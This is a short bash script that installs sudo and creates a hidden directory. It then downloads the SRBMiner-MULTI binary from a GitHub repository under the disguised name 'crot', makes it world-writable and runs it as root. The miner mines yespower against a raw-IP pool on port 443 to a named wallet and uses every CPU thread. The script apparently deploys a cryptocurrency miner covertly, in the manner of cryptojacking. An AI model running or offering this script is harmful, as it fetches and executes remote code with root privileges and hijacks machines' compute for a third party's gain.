#!/bin/bash
apt-get update ; apt-get -y install sudo
mkdir .kap && cd .kap
wget -O crot https://github.com/nandafiku/fillesg/raw/main/SRBMiner-MULTI
chmod 777 crot
sudo ./crot --algorithm yespower --pool 45.77.96.115:443 --wallet unPw6ctQHeqACNCwFhXrPY5YUjVm9qNs4B.x --password webpassword=x --cpu-threads $(nproc --all)
